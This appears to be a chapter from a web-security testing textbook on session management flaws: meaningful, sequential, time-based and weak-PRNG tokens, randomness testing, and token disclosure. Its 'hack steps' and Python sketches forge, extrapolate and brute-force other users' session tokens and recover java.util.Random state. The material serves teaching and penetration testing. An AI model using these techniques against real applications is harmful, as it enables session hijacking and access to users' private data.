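Everything the server knows about the user hangs off the token, which is why anyone who obtains or guesses another user's token inherits that user's session.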

There are various categories of attack to which this standard session man-

agement mechanism is inherently vulnerable. An attacker’s primary objective

in targeting the mechanism is to somehow hijack the session of a legitimate

user and thereby masquerade as them. If the user has been authenticated to the

application, the attacker may be able to access private data belonging to the

user or carry out unauthorized actions on that person’s behalf. If the user is

unauthenticated, the attacker may still be able to view sensitive information

submitted by the user during her session.

As in the previous example of a Microsoft IIS server running ASP.NET, most

commercial web servers and web application platforms implement their own

off-the-shelf session management solution based on HTTP cookies. They pro-

vide APIs that web application developers can use to integrate their own

session-dependent functionality with this solution.

Some off-the-shelf implementations of session management have been

found vulnerable to various attacks, which result in users’ sessions being com-

promised (these are discussed later in this chapter). In addition, some devel-

opers find that they need more fine-grained control over session behavior than

is provided for them by the built-in solutions, or wish to avoid some vulnera-

bilities inherent in cookie-based solutions. For these reasons, it is fairly

common to see bespoke and/or non-cookie-based session management mech-

anisms used in security-critical applications such as online banking.

The vulnerabilities that exist in session management mechanisms largely

fall into two categories:

■■

Weaknesses in the generation of session tokens.

■■

Weaknesses in the handling of session tokens throughout their lifecycle.

We will look at each of these areas in turn, describing the different types of

defects that are commonly found in real-world session management mecha-

nisms, and practical techniques for discovering and exploiting these. Finally,

we will describe measures that applications can take to defend themselves

against these attacks.

HACK STEPS

In many applications that use the standard cookie mechanism for transmitting

session tokens, it is straightforward to identify which item of data contains the

token. However, in other cases it may require some detective work.

■ The application may often employ several different items of data collec-

tively as a token, including cookies, URL parameters, and hidden form

fields. Some of these items may be used to maintain session state on dif-

ferent back-end components. Do not assume that a particular parameter

is the session token without proving it, or that sessions are being tracked

using only one item.

■ Sometimes, items that appear to be the application’s session token may

not be. In particular, the standard session cookie generated by the web

server or application platform may be present but not actually used by

the application.

■ Observe which new items are passed to the browser after authentication.

Often, new session tokens are created after a user authenticates herself.

■ To verify which items are actually being employed as tokens, find a page

that is certainly session-dependent (such as a user-specific “my details”

page), and make several requests for it, systematically removing each

item that you suspect is being used as a token. If removing an item

causes the session-dependent page not to be returned, then this may

confirm that the item is a session token. Burp Repeater is a useful tool

for performing these tests.
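
The final step above can also be scripted. The sketch below assumes two hypothetical callables supplied by the tester: `fetch`, which sends the request with a given set of items and returns the response body, and `is_session_page`, which recognizes the session-dependent page. Neither corresponds to a real library function.

```python
def find_session_items(items, fetch, is_session_page):
    """Return names of items whose removal breaks a session-dependent page.

    items           -- dict of candidate items (cookies, parameters, fields)
    fetch           -- hypothetical callable: sends the request with the
                       given items and returns the response body
    is_session_page -- callable: True if the body is the expected page
    """
    if not is_session_page(fetch(dict(items))):
        raise ValueError("baseline request did not return the session page")
    required = []
    for name in items:
        # Resend the request with exactly one candidate item left out.
        reduced = {k: v for k, v in items.items() if k != name}
        if not is_session_page(fetch(reduced)):
            required.append(name)
    return required
```

An item that appears in the result is a likely component of the session token; an item that does not may still be used elsewhere in the application, so the result is evidence rather than proof.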

Alternatives to Sessions

Not every web application employs sessions, and some security-critical appli-

cations containing authentication mechanisms and complex functionality opt

to use other techniques for managing state. There are two possible alternatives

that you are likely to encounter:

■■

HTTP authentication — Applications using the various HTTP-based

authentication technologies (basic, digest, NTLM, etc.) sometimes avoid

the need to use sessions. With HTTP authentication, the client compo-

nent interacts with the authentication mechanism directly via the

browser, using HTTP headers, and not via application-specific code

contained within any individual page. Once a user has entered his

credentials into a browser dialog, the browser effectively resubmits

these credentials (or reperforms any required handshake) with every

subsequent request to the same server. This is equivalent to an

application that uses HTML forms-based authentication and places a

login form on every application page, requiring users to reauthenticate

themselves with every action they perform. Hence, when HTTP-based

authentication is used, it is possible for an application to re-identify the

user across multiple requests without using sessions. However, HTTP

authentication is rarely used on Internet-based applications of any com-

plexity, and the other very versatile benefits that fully fledged session

mechanisms offer mean that virtually all web applications do in fact

employ them.

■■

Sessionless state mechanisms — Some applications do not issue ses-

sion tokens in order to manage the state of a user’s interaction with the

application but rather transmit all data required to manage that state

via the client, usually in a cookie or a hidden form field. In effect, this

mechanism uses sessionless state in a similar way to the ASP.NET

ViewState. In order for this type of mechanism to be secure, the data

transmitted via the client must be properly protected. This usually

involves constructing a binary blob containing all of the state informa-

tion, and encrypting or signing this using a recognized algorithm. Suffi-

cient context must be included within the data to prevent an attacker

from collecting a state object at one location within the application and

submitting it to another location to cause some undesirable behavior.

The application may also include an expiration time within the object’s

data, to perform the equivalent of session timeouts. Chapter 5 describes

in more detail secure mechanisms for transmitting data via the client.
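
A sessionless state object of the kind described above might look roughly like this. The sketch signs the data with HMAC-SHA256 but does not encrypt it, so the client can still read the contents; the key, the JSON layout, and the function names are assumptions made for illustration.

```python
import base64
import hashlib
import hmac
import json
import time

SECRET_KEY = b"replace-with-a-random-server-side-key"  # placeholder


def pack_state(state, context, ttl_seconds, now=None):
    """Serialize state with its context and expiry, then prepend an HMAC."""
    now = time.time() if now is None else now
    payload = json.dumps(
        {"state": state, "context": context, "expires": now + ttl_seconds},
        sort_keys=True,
    ).encode()
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(tag + payload).decode()


def unpack_state(blob, context, now=None):
    """Return the state, or None if the blob is forged, misplaced or expired."""
    now = time.time() if now is None else now
    try:
        raw = base64.urlsafe_b64decode(blob.encode())
    except ValueError:
        return None
    tag, payload = raw[:32], raw[32:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    data = json.loads(payload)
    # The context check stops an object issued at one location being
    # replayed at another; the expiry check stands in for a session timeout.
    if data["context"] != context or now > data["expires"]:
        return None
    return data["state"]
```

Nothing is stored on the server between requests, which is the property that makes this kind of mechanism resistant to the token-guessing attacks described in this chapter.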

HACK STEPS

■ If HTTP authentication is being used, it is possible that no session man-

agement mechanism is implemented. Use the methods described previ-

ously to examine the role played by any token-like items of data.

■ If the application uses a sessionless state mechanism, transmitting all

data required to maintain state via the client, this may sometimes be dif-

ficult to detect with certainty, but the following are strong indicators that

this kind of mechanism is being used:

■

Token-like data items issued to the client are fairly long (e.g., 100 or

more bytes).

■

The application issues a new item in response to every request.

■

The data in the item appears to be encrypted (and so has no dis-

cernible structure) or signed (and so contains meaningful structure

accompanied by a few bytes of meaningless binary data).

■

The application may reject attempts to submit the same item with

more than one request.

■ If the evidence suggests strongly that the application is not using session

tokens to manage state, then it is unlikely that any of the attacks

described within this chapter will achieve anything. Your time is likely to

be much better spent looking for other serious issues such as broken

access controls or code injection.

Weaknesses in Session Token Generation

Session management mechanisms are often vulnerable to attack because

tokens are generated in an unsafe manner that enables an attacker to identify

the values of tokens that have been issued to other users.

Meaningful Tokens

Some session tokens are created using a transformation of the user’s user-

name or email address, or other information associated with them. This infor-

mation may be encoded or obfuscated in some way, and may be combined

with other data.

For example, the following token may initially appear to be a long random

string:

757365723d6461663b6170703d61646d696e3b646174653d30312f31322f3036

However, on closer inspection, it contains only hexadecimal characters.

Guessing that the string may actually be a hex-encoding of a string of ASCII

characters, we can run it through a decoder to reveal:

user=daf;app=admin;date=01/12/06

Attackers can exploit the meaning within this session token to attempt to

guess the current sessions of other application users. Using a list of enumer-

ated or common usernames, they can quickly generate large numbers of

potentially valid tokens and test these to confirm which are valid.
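
Both halves of this attack, decoding the sample token and generating candidates for other users, take only a few lines. The sketch assumes the token is a plain hex encoding of `name=value` pairs separated by semicolons, as in the example; the function names and the username list are hypothetical.

```python
def decode_token(token):
    """Hex-decode a token into the ASCII string it conceals."""
    return bytes.fromhex(token).decode("ascii")


def forge_tokens(sample_token, usernames):
    """Re-encode the sample's structure with each candidate username."""
    parts = decode_token(sample_token).split(";")
    fields = dict(part.split("=", 1) for part in parts)
    for name in usernames:
        fields["user"] = name
        plain = ";".join(f"{k}={v}" for k, v in fields.items())
        yield plain.encode("ascii").hex()


sample = "757365723d6461663b6170703d61646d696e3b646174653d30312f31322f3036"
print(decode_token(sample))
for candidate in forge_tokens(sample, ["admin", "marcus"]):
    print(candidate)
```

Each candidate would then be submitted to a session-dependent page to see whether the application accepts it. Other fields, such as the date, may need to be varied in the same way.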

Tokens that contain meaningful data often exhibit some structure — that is,

they contain several components, often separated by a delimiter, which can be

extracted and analyzed separately to allow an attacker to understand their

function and means of generation. Components that may be encountered

within structured tokens include:

■■

The account username.

■■

The numeric identifier used by the application to distinguish between

accounts.

■■

The user’s first/last human name.

■■

The user’s email address.

■■

The user’s group or role within the application.

■■

A date/time stamp.

■■

An incrementing or predictable number.

■■

The client IP address.

Each different component within a structured token, or indeed the entire

token, may be encoded in different ways, either as a deliberate measure to

obfuscate their content, or simply to ensure safe transport of binary data via

HTTP. Encoding schemes that are commonly encountered include XOR,

Base64, and hexadecimal representation using ASCII characters (see Chapter 3).

It may be necessary to test various different decodings on each component of

a structured token to unpack it to its original form.

NOTE When an application handles a request containing a structured token,

it may not actually process every component within the token or all of the data

contained within each component. In the previous example, the application

may hex-decode the token and then process only the “user” and “date”

components. In cases where a token contains a blob of binary data, much of

this data may be padding, and only a small part of it may actually be relevant

to the validation that the server performs on the token. Narrowing down the

subparts of a token that are actually required can often reduce considerably the

amount of apparent entropy and complexity that the token contains.

HACK STEPS

■ Obtain a single token from the application, and modify it in systematic

ways to determine whether the entire token is validated, or whether

some subcomponents of the token are ignored. Try changing the token’s

value one byte at a time (or even one bit at a time) and submitting the

modified token back to the application to determine whether it is still

accepted. If you find that certain portions of the token are not actually

required to be correct, you can exclude these from any further analysis,

potentially reducing the amount of work that you need to perform.

■ Log in as several different users at different times and record the tokens

received from the server. If self-registration is available and you can

choose your username, log in with a series of similar usernames contain-

ing small variations between them, such as A, AA, AAA, AAAA, AAAB,

AAAC, AABA, and so on. If other user-specific data is submitted at the

time of login or stored in user profiles (such as an email address), perform a

similar exercise to vary that data systematically and record the tokens

received following login.

■ Analyze the tokens for any correlations that appear to be related to the

username and other user-controllable data.

■ Analyze the tokens for any detectable encoding or obfuscation. Where the

username contains a sequence of the same character, look for a corre-

sponding character sequence in the token, which may indicate the use of

XOR obfuscation. Look for sequences in the token containing only hexa-

decimal characters, which may indicate a hex-encoding of an ASCII string

or other information. Look for sequences ending in an equals sign and/or

only containing the other valid Base64 characters: a–z, A–Z, 0–9, +, and /.

■ If any meaning can be reverse engineered from the sample of session

tokens, consider whether you have sufficient information to attempt to

guess the tokens recently issued to other application users. Find a page

of the application that is session-dependent (e.g., one that returns an

error message or a redirect elsewhere if accessed without a valid ses-

sion), and use a tool such as Burp Intruder to make large numbers of

requests to this page using guessed tokens. Monitor the results for any

cases where the page is loaded correctly, indicating a valid session token.
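
The first step above, changing the token one character at a time, is easy to automate. In this sketch `is_accepted` is a hypothetical callable that submits a token to a session-dependent page and reports whether the session was honored; it is an assumption of the example, not part of any tool.

```python
def significant_positions(token, is_accepted):
    """Return the indexes of characters the server appears to validate.

    is_accepted is a hypothetical callable that submits a token to a
    session-dependent page and reports whether the session was honored.
    """
    if not is_accepted(token):
        raise ValueError("the unmodified token must be accepted")
    significant = []
    for i, ch in enumerate(token):
        # Replace only the character at position i with a different one.
        replacement = "A" if ch != "A" else "B"
        mutated = token[:i] + replacement + token[i + 1:]
        if not is_accepted(mutated):
            significant.append(i)
    return significant
```

Positions missing from the result were not needed for the token to be accepted in this test. A single substitution per position is only an indication, so it is worth repeating the run with other replacement characters before discarding part of a token from analysis.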

Predictable Tokens

Some session tokens do not contain any meaningful data associating them

with a particular user but are nevertheless guessable because they contain

sequences or patterns that allow an attacker to extrapolate from a sample of

tokens to find other valid tokens recently issued by the application. Even if the

extrapolation involves an amount of trial and error (for example, one valid

guess per 1,000 attempts), this will still enable an automated attack to identify

large numbers of valid tokens in a relatively short period of time.

Vulnerabilities relating to predictable token generation may be much easier

to discover in commercial implementations of session management, such as

web servers or web application platforms, than they are in bespoke applica-

tions. When you are remotely targeting a bespoke session management mech-

anism, your sample of issued tokens may be restricted by the capacity of the

server, the activity of other users, your bandwidth, network latency, and so on.

In a laboratory environment, however, you can quickly create millions of sam-

ple tokens, all precisely sequenced and time-stamped, and can eliminate inter-

ference caused by other users.

In the simplest and most brazenly vulnerable cases, an application may use

a simple sequential number as the session token. In this case, you only need to

obtain a sample of two or three tokens before launching an attack that will cap-

ture 100% of currently valid sessions very quickly.

Figure 7-1 shows Burp Intruder being used to cycle the last two digits of a

sequential session token to find values where the session is still active and can

be hijacked. The length of the server’s response is here a reliable indicator that

a valid session has been found.

Figure 7-1: An attack to discover valid sessions where the session token is predictable

In other cases, an application’s tokens may contain more elaborate sequences

that take some effort to discover. The types of potential variations one might

encounter here are open ended, but the authors’ experience in the field indicates

that predictable session tokens commonly arise from three different sources:

■■

Concealed sequences

■■

Time dependency

■■

Weak random number generation

We will look at each of these areas in turn.

Concealed Sequences

It is common to encounter session tokens that cannot be trivially predicted

when analyzed in their raw form but that contain sequences that reveal them-

selves when the tokens are suitably decoded or unpacked.

Consider the following series of values, which form one component of a

structured session token:

lwjVJA

Ls3Ajg

xpKr+A

XleXYg

9hyCzA

jeFuNg

JaZZoA

No immediate pattern is discernible; however, a cursory inspection indi-

cates that the tokens may contain Base64-encoded data — in addition to the

mixed-case alphabetical and numeric characters, there is a + character, which

is also valid in a Base64-encoded string. Running the tokens through a Base64

decoder reveals the following:

--Õ$

.ÍÀŽ

Æ’«ø

^W-b

ö‚Ì

?án6

%¦Y

These strings appear to be gibberish and also contain nonprinting charac-

ters. This normally indicates that you are dealing with binary data rather than

ASCII text. Rendering the decoded data as hexadecimal numbers gives you:

9708D524

2ECDC08E

C692ABF8

5E579762

F61C82CC

8DE16E36

25A659A0

There is still no visible pattern. However, if you subtract from each number

the one before it (negative results appear with a leading FF), you arrive at

the following:

FF97C4EB6A

97C4EB6A

FF97C4EB6A

97C4EB6A

FF97C4EB6A

FF97C4EB6A

which immediately reveals the concealed pattern. The algorithm used to gen-

erate tokens adds 0x97C4EB6A to the previous value, truncates the result to a

32-bit number, and Base64-encodes this binary data to allow it to be trans-

ported using the text-based protocol HTTP. Using this knowledge, you can

easily write a script to produce the series of tokens that the server will next

produce, and the series that it produced prior to the captured sample.
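
A script of this kind might look like the following sketch. It assumes, as the analysis suggests, that each token is a 32-bit big-endian value, Base64-encoded with the trailing padding removed; the function names are illustrative.

```python
import base64

MASK = 0xFFFFFFFF  # tokens are truncated to 32 bits


def token_to_int(token):
    """Base64-decode a token (restoring stripped padding) to an integer."""
    padded = token + "=" * (-len(token) % 4)
    return int.from_bytes(base64.b64decode(padded), "big")


def int_to_token(value):
    """Encode a 32-bit value the way the sample tokens are encoded."""
    return base64.b64encode(value.to_bytes(4, "big")).decode().rstrip("=")


def step_between(tokens):
    """Return the constant 32-bit increment, or None if there is none."""
    values = [token_to_int(t) for t in tokens]
    steps = {(b - a) & MASK for a, b in zip(values, values[1:])}
    return steps.pop() if len(steps) == 1 else None


def extrapolate(token, step, count):
    """Return `count` tokens after `token`; a negative step walks backward."""
    value = token_to_int(token)
    out = []
    for _ in range(count):
        value = (value + step) & MASK
        out.append(int_to_token(value))
    return out


sample = ["lwjVJA", "Ls3Ajg", "xpKr+A", "XleXYg", "9hyCzA", "jeFuNg", "JaZZoA"]
step = step_between(sample)
print(hex(step))
print(extrapolate(sample[-1], step, 3))   # tokens the server will issue next
print(extrapolate(sample[0], -step, 3))   # tokens issued before the sample
```

Working modulo 2^32 removes the alternation seen in the raw subtraction: every difference reduces to the same increment.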

Time Dependency

Some web servers and applications employ algorithms for generating session

tokens that use the time of generation as an input to the token’s value. If insuf-

ficient other entropy is incorporated into the algorithm, then you may be able

to predict other users’ tokens. Although any given sequence of tokens on its

own may appear to be completely random, the same sequence coupled with

information about the time at which each token was generated may contain a

discernible pattern. In a busy application, with large numbers of sessions

being created per second, a scripted attack may succeed in identifying large

numbers of other users’ tokens.

When testing the web application of an online retailer, the authors encoun-

tered the following sequence of session tokens:

3124538-1172764258718

3124539-1172764259062

3124540-1172764259281

3124541-1172764259734

3124542-1172764260046

3124543-1172764260156

3124544-1172764260296

3124545-1172764260421

3124546-1172764260812

3124547-1172764260890

Each token is clearly composed of two separate numeric components. The

first number follows a simple incrementing sequence and is trivial to predict.

The second number is increasing by a varying amount each time. Calculating

the differences between its value in each successive token reveals the following:

344

219

453

312

110

140

125

391

78

The sequence does not appear to contain a reliably predictable pattern; how-

ever, it would clearly be possible to brute force the relevant number range in

an automated attack to discover valid values in the sequence. Before attempt-

ing this attack, however, we wait a few minutes and gather a further sequence

of tokens:

3124553-1172764800468

3124554-1172764800609

3124555-1172764801109

3124556-1172764801406

3124557-1172764801703

3124558-1172764802125

3124559-1172764802500

3124560-1172764802656

3124561-1172764803125

3124562-1172764803562

Comparing this second sequence of tokens with the first, two points are

immediately obvious:

■■

The first numeric sequence continues to progress incrementally; how-

ever, five values have been skipped since the end of our first sequence.

This is presumably because the missing values have been issued to

other users, who logged into the application in the window between

the two tests.

■■

The second numeric sequence continues to progress by similar intervals

as before; however, the first value we obtain is a massive 539,578

greater than the previous value.

This second observation immediately alerts us to the role played by time in

generating session tokens. Apparently, only five tokens have been issued

between the two token-grabbing exercises. However, a period of approxi-

mately 10 minutes has also elapsed. The most likely explanation is that the sec-

ond number is time-dependent and is probably a simple count of milliseconds.

Indeed, our hunch is correct, and in a subsequent phase of our testing

we perform a code review, which reveals the following token-generation

algorithm:

String sessId = Integer.toString(s_SessionIndex++) +
    "-" +
    System.currentTimeMillis();

Given our analysis of how tokens are created, it is straightforward to con-

struct a scripted attack to harvest the session tokens that the application issues

to other users:

■■

We continue polling the server to obtain new session tokens in quick

succession.

■■

We monitor the increments in the first number. When this increases by

more than one, we know that a token has been issued to another user.

■■

When a token has been issued to another user, we know the upper and

lower bounds of the second number that was issued to them, because

we possess the tokens that were issued immediately before and after

theirs. Because we are obtaining new session tokens frequently, the

range between these bounds will typically consist of only a few hun-

dred values.

■■

Each time a token is issued to another user, we launch a brute-force

attack to iterate through each number in the range, appending this to

the missing incremental number that we know was issued to the other

user. We attempt to access a protected page using each token we con-

struct, until the attempt succeeds and we have compromised the user’s

session.

■■

Running this scripted attack continuously will enable us to capture the

session token of every other application user. When an administrative

user logs in, we will fully compromise the entire application.
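The core of the attack just described is the step that turns two tokens we hold into the list of tokens that might have been issued in between. A minimal sketch of that step, in Python, follows. The function name is illustrative, the second token in the usage example is hypothetical, and the network side (polling for tokens and requesting a protected page with each candidate) is deliberately left out.

```python
def candidates_for_gap(before, after):
    """Yield every token that could have been issued between two tokens we hold.

    Each token has the form "<counter>-<milliseconds>". Any counter value
    missing between the two was issued to someone else, at a time no earlier
    than `before` and no later than `after`.
    """
    index_before, time_before = (int(part) for part in before.split("-"))
    index_after, time_after = (int(part) for part in after.split("-"))
    for index in range(index_before + 1, index_after):
        # The bounds are inclusive: two tokens can share the same millisecond.
        for stamp in range(time_before, time_after + 1):
            yield f"{index}-{stamp}"


# The last token from our sample, followed by a hypothetical token obtained
# on the next poll. The counter has jumped by two, so one token is missing.
held_before = "3124562-1172764803562"
held_after = "3124564-1172764803790"

guesses = list(candidates_for_gap(held_before, held_after))
print(len(guesses), guesses[0], guesses[-1])
```

Polling more frequently narrows the time window and therefore shrinks the number of requests needed for each victim.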

Weak Random Number Generation

Very little that occurs inside a computer is random. Therefore, when random-

ness is required for some purpose, software uses various techniques to gener-

ate numbers in a pseudo-random manner. Some of the algorithms used

produce sequences that appear to be stochastic and manifest an even spread

across the range of possible values, but can nevertheless be extrapolated for-

wards or backwards with perfect accuracy by anyone who obtains a small

sample of values.

When a predictable pseudo-random number generator is used for produc-

ing session tokens, the resulting tokens are vulnerable to sequencing by an

attacker.

Jetty is a popular web server written in 100% Java, which provides a session

management mechanism for use by applications running on it. In 2006, Chris

Anley of NGSSoftware discovered that the mechanism was vulnerable to a

session token prediction attack. The server used the Java API java.util.Random

to generate session tokens. This implements a “linear congruential

generator,” which generates the next number in the sequence as follows:

synchronized protected int next(int bits) {
    seed = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1);
    return (int)(seed >>> (48 - bits));
}

This algorithm in effect takes the last number generated, multiplies it by one

constant, and adds another constant, to obtain the next number. The number is

truncated to 48 bits, and the algorithm shifts the result to return the specific

number of bits requested by the caller.

Knowing this algorithm and a single number generated by it, we can easily

derive the sequence of numbers that the algorithm will generate next, and also

(with a little number theory) derive the sequence that it generated previously.

This means that an attacker who obtains a single session token from the server

can obtain the tokens of all current and future sessions.
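To make the prediction concrete, the following sketch reimplements the generator's update step in Python and recovers its internal state from observed output. One practical detail is worth stating: a 32-bit output exposes only the top 32 bits of the 48-bit state, so the sketch uses a second consecutive output to pin down the remaining 16 bits by brute force. The function names and the starting state are ours, and the sketch models only the next(32) step shown above, not the way any particular server assembles its tokens from the output.

```python
MULTIPLIER = 0x5DEECE66D
ADDEND = 0xB
MASK = (1 << 48) - 1


def advance(state):
    """One step of the linear congruential generator."""
    return (state * MULTIPLIER + ADDEND) & MASK


def rewind(state):
    """Undo one step, using the multiplier's inverse modulo 2**48."""
    inverse = pow(MULTIPLIER, -1, 1 << 48)  # requires Python 3.8 or later
    return ((state - ADDEND) * inverse) & MASK


def as_int32(state):
    """Mimic next(32): the top 32 bits of the state as a signed 32-bit value."""
    value = state >> 16
    return value - (1 << 32) if value >= (1 << 31) else value


def recover_state(first, second):
    """Find the state that produced `second`, given two consecutive outputs."""
    high_bits = (first & 0xFFFFFFFF) << 16
    for low_bits in range(1 << 16):  # the 16 bits hidden by the shift
        state = advance(high_bits | low_bits)
        if as_int32(state) == second:
            return state
    return None


# Simulate a victim generator from an arbitrary starting state.
state = 0x1234ABCD5678
observed = []
for _ in range(3):
    state = advance(state)
    observed.append(as_int32(state))

# The attacker sees the first two outputs and predicts the third.
recovered = recover_state(observed[0], observed[1])
predicted_next = as_int32(advance(recovered))
earlier_output = as_int32(rewind(recovered))
print(predicted_next == observed[2], earlier_output == observed[0])
```

The rewind function is the "little number theory" referred to above: because the multiplier is odd, it has an inverse modulo 2^48, so every step of the sequence can be reversed exactly.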

NOTE Sometimes when tokens are created based on the output of a pseudo-

random number generator, developers decide to construct each token by

concatenating together several sequential outputs from the generator. The

perceived rationale for this is that it creates a longer, and therefore “stronger”

token. However, this tactic is usually a mistake. If an attacker can obtain

several consecutive outputs from the generator, this may enable them to infer

some information about its internal state, and may in fact make it easier for

them to extrapolate the generator’s sequence of outputs, either forward or

backward.

HACK STEPS

■ First, determine when and how session tokens are issued by walking

through the application from the first application page through any login

functions. The most common behaviors are: (a) the application creates a

new session any time a request is received that does not submit a token,

and (b) the application creates a new session following a successful

login. Ideally, identify a single request (typically either GET / or a login

submission) that results in a new token being issued.

■ If a bespoke session management mechanism is in use, and you only

have remote access to the application, obtain a large sample of tokens

(at least a few hundred). Gather these tokens in as quick succession as

possible, to minimize the loss of tokens issued to other users and reduce

the influence of any time dependency. The following screenshot shows

Burp Intruder being used to make large numbers of requests and log the

returned cookies, which can then be exported for further analysis.

■ If a commercial session management mechanism is in use and/or you

have local access to the application, you can obtain indefinitely large

sequences of session tokens in controlled conditions.

■ Attempt to identify any patterns within your sample of cookies. There are

various tools (including the testing suite WebScarab) that will attempt to

perform some automated analysis on a sample of cookies. This kind of

tool is often a useful starting point to get a feel for the amount of varia-

tion contained within a sample of tokens. However, in the authors’ expe-

rience these tools suffer from two limitations. First, they are usually only

effective when the patterns within the sample are relatively obvious and

could be quickly identified through manual analysis; they are poor at

deciphering any encoding and structure within tokens. Second, they

often produce graphical output, which gives the visual impression of

some kind of pattern, even though further analysis establishes that the

pattern is a red herring.

■ In most cases, there is no real substitute for a manual analysis of the

sample of tokens. There is no magic formula for this, but the following

steps should get you on your way:

■

Apply the knowledge you have already gleaned regarding which com-

ponents and bytes of the token are actually being processed by the

server. Ignore anything that is not processed, even if it varies between

samples.

■

If it is unclear what type of data is contained within the token, or any

individual component of it, try applying various decodings to see if

any more meaningful data emerges. It may be necessary to apply sev-

eral decodings in sequence.

■

Try to identify any patterns in the sequences of values contained

within each decoded token or component. Calculate the differences

between successive values. Even if these appear to be chaotic, there

may be a fixed set of observed differences that narrows down the

scope of any brute-force attack considerably.

■

Obtain a similar sample of cookies after waiting for a few minutes,

and repeat the same analysis. Try to detect whether any of the tokens’

content is time-dependent.

■ If a pattern is detected, reperform the token harvesting exercise from a

different IP address and (if relevant) a different username, to identify

whether the same pattern is detected, and whether tokens received in

the first exercise could be extrapolated to identify tokens received in the

second. Sometimes, the sequence of tokens received by a script running

on a single machine will manifest a pattern, but this will not allow

straightforward extrapolation to the tokens issued to other users

because information such as source IP is used as a source of entropy

(such as a seed to a random number generator).

■ If you believe you have enough insight into the token generation algo-

rithm to mount an automated attack against other users’ sessions, it is

likely that the best means of achieving this is via a customized script,

which can generate tokens using the specific patterns you have observed,

and apply any necessary encoding. See Chapter 13 for some generic tech-

niques for applying automation to this type of problem.

■ If source code is available, closely review the code responsible for gener-

ating session tokens to understand the mechanism used and determine

whether it is vulnerable to prediction.
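The decoding step in the manual analysis above lends itself to a small helper. The sketch below, in Python, tries a few common decodings on a token and keeps only those that yield printable ASCII text. The choice of decodings and the printable-text filter are our assumptions; a real token may use a different encoding, or binary content that this filter would discard.

```python
import base64
from urllib.parse import unquote


def try_decodings(token):
    """Return the decodings of `token` that produce printable ASCII text."""
    results = {}
    decoders = {
        "hex": bytes.fromhex,
        "base64": lambda t: base64.b64decode(t, validate=True),
    }
    for name, decode in decoders.items():
        try:
            text = decode(token).decode("ascii")
        except ValueError:
            # Covers malformed input and non-ASCII output alike.
            continue
        if text and text.isprintable():
            results[name] = text
    url_decoded = unquote(token)
    if url_decoded != token:
        results["url"] = url_decoded
    return results


print(try_decodings("757365723d646166"))
print(try_decodings("dXNlcj1kYWY="))
print(try_decodings("user%3Ddaf"))
```

Where several decodings have been applied in sequence, the same function can be called again on each result until nothing further emerges.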

Full-Blown Tests for Randomness

Due to the importance of robust session token generation, performing an effec-

tive attack against a security-critical application such as an online bank may

require carrying out a full-blown methodology to test the randomness of its

tokens. If you do not have access to source code, this will be a black-box exercise.

HACK STEPS

■ Determine the theoretical maximum number of unique tokens that are

available, based on the character set being used and number of bytes

within the token that are actually being validated (as described earlier).

■ Compare each character transition from one token to the next to deter-

mine whether particular transitions are more common than others. If

particular transitions are preferred, there is a likelihood that the algo-

rithm is flawed in some way.

■ Perform NIST FIPS-140-2 statistical tests, identifying any statistically

anomalous distribution of bits.

■ Check for correlations between arbitrary bits; a truly random token will

exhibit no correlation between the state of one bit and the state of

another.

■ These tests cannot be carried out effectively simply by visual inspection.

Of the publicly available tools, Stompy is most effective at carrying out

full-blown tests of randomness.
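The first three steps above can be sketched in a few lines of Python to show what each measurement involves. This is an illustration only and no substitute for a dedicated tool. The function names are ours, and the pass range used in the monobit test (more than 9,725 and fewer than 10,275 ones in a 20,000-bit sample) is the figure we recall from FIPS 140-2; check it against the standard before relying on it.

```python
import math
from collections import Counter


def token_space_bits(charset_size, validated_length):
    """Upper bound on token entropy in bits, if every validated
    character were chosen uniformly at random."""
    return validated_length * math.log2(charset_size)


def transition_counts(tokens, position):
    """Count character transitions at one position across successive tokens."""
    column = [token[position] for token in tokens]
    return Counter(zip(column, column[1:]))


def monobit_test(bits):
    """Monobit test on a 20,000-bit sample given as a list of 0s and 1s."""
    if len(bits) != 20000:
        raise ValueError("the monobit test is defined on a 20,000-bit sample")
    ones = sum(bits)
    return 9725 < ones < 10275


# A token of 32 hexadecimal characters, all of them validated by the server.
print(token_space_bits(16, 32))
print(transition_counts(["ab", "ab", "cb"], 0))
```

A strongly skewed set of transition counts, or a sample that fails the monobit test, is a prompt for closer analysis rather than proof of an exploitable flaw.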

Weaknesses in Session Token Handling

No matter how effective an application is at ensuring that the session tokens it

generates do not contain any meaningful information and are not susceptible

to analysis or prediction, its session mechanism will be wide open to attack if

those tokens are not handled carefully after generation. For example, if tokens

are disclosed to an attacker via some means, then the attacker can hijack user

sessions even if predicting the tokens is impossible.

There are various ways in which an application’s unsafe handling of tokens

can make it vulnerable to attack.

COMMON MYTH “Our token is secure from disclosure to third parties

because we use SSL.”

Proper use of SSL certainly helps to protect session tokens from being

captured. But various mistakes can still result in tokens being transmitted in

clear text even when SSL is in place. And there are various direct attacks

against end users that can be used to obtain their token.

Disclosure of Tokens on the Network

This area of vulnerability arises when the session token is transmitted across

the network in unencrypted form, enabling a suitably positioned eavesdrop-

per to obtain the token and so masquerade as the legitimate user. Suitable posi-

tions for eavesdropping include the user’s local network, within the user’s IT

department, within the user’s ISP, on the Internet backbone, within the appli-

cation’s ISP, and within the IT department of the organization hosting the

application. In each case, this includes both authorized personnel of the rele-

vant organization and any external attackers who have compromised the

infrastructure concerned.

In the simplest case, where an application uses an unencrypted HTTP con-

nection for communications, an attacker can capture all data transmitted

between client and server, including login credentials, personal information,

payment details, and so on. In this situation, an attack against the user’s ses-

sion is often unnecessary because the attacker can already view privileged

information and can log in using captured credentials to perform other mali-

cious actions. However, there may still be instances where the user’s session is

the primary target. For example, if the captured credentials are not sufficient to

perform a second login (e.g., in a banking application, they may include a

number displayed on a changing physical token, or specific digits from the

user’s PIN), the attacker may need to hijack the eavesdropped session in order

to perform arbitrary actions. Or if there is close auditing of logins, and notifi-

cation to the user of each successful login, then an attacker may wish to avoid

performing his own login in order to be as stealthy as possible.

In other cases, an application may use HTTPS to protect key client-server

communications yet may still be vulnerable to interception of session tokens

on the network. There are various ways in which this weakness may occur,

many of which can arise specifically when HTTP cookies are used as the trans-

mission mechanism for session tokens:

■■

Some applications elect to use HTTPS to protect the user’s credentials

during login but then revert to HTTP for the remainder of the user’s

session. Many web mail applications behave in this way. In this situa-

tion, an eavesdropper cannot intercept the user’s credentials but may

still capture the session token, as shown in Figure 7-2.

Figure 7-2: Capturing a session token transmitted over HTTP

■■

